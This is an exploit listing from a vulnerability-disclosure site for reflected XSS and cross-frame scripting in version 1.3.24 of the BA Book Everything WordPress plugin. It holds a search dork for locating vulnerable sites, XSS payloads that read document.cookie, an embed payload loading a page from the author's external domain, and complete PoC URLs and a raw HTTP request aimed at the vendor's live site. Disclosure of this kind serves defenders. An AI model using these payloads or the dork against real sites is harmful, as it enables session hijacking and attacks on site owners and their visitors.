BA Book Everything WordPress plugin v1.3.24 - Unauthenticated Reflected XSS & XFS

2020.11.11
ru Ex.Mi (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79, CWE-1021
Dork: inurl:/wp-content/plugins/ba-book-everything/

[+] :: Exploit Title: BA Book Everything WordPress plugin v1.3.24 - Unauthenticated Reflected XSS & XFS [+] :: Google Dork: inurl:/wp-content/plugins/ba-book-everything/ [+] :: Date: 2020-09-30 [+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ] [+] :: Vendor: Booking Algorithms [ https://ba-booking.com ] [+] :: Software Version: 1.3.24 [+] :: Software Link: https://wordpress.org/plugins/ba-book-everything/ [+] :: Tested on: Kali Linux [+] :: CVE: [+] :: CWE: CWE-79, CWE-1021 [i] :: Info: An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the BA Book Everything plugin v1.3.24 for WordPress. Vulnerable parameter(s): date_from, date_to. [!] :: Affected Themes: Royalux [ by Secret Laboratory ] - https://themeforest.net/item/royalux-hotel-booking-wordpress-theme/27527508 [$] :: Payloads: "><!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);//"> "><embed src=//ex-mi.ru/payload/xfsii.html></embed> [!] :: PoC: https://ba-booking.com/ba-book-everything/search-result/?date_from=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);//%22%3E&date_to=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.domain);//%22%3E [!] :: PoC (Burp Suite): GET /ba-book-everything/search-result/?date_from=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);//%22%3E&date_to=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.domain);//%22%3E HTTP/1.1 Host: ba-booking.com [@] :: Contacts: Website: ex-mi.ru Telegram: @ex_mi GitHub: @ex-mi Medium: @ex-mi

References:

https://ex-mi.ru/exploit/%5B2020-09-30%5D-%5BWordPress%5D-ba-book-everything-plugin-v1.3.24.txt
https://github.com/ex-mi/ex-mi.github.io/blob/main/exploit/%5B2020-09-30%5D-%5BWordPress%5D-ba-book-everything-plugin-v1.3.24.txt
https://wordpress.org/plugins/ba-book-everything/


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top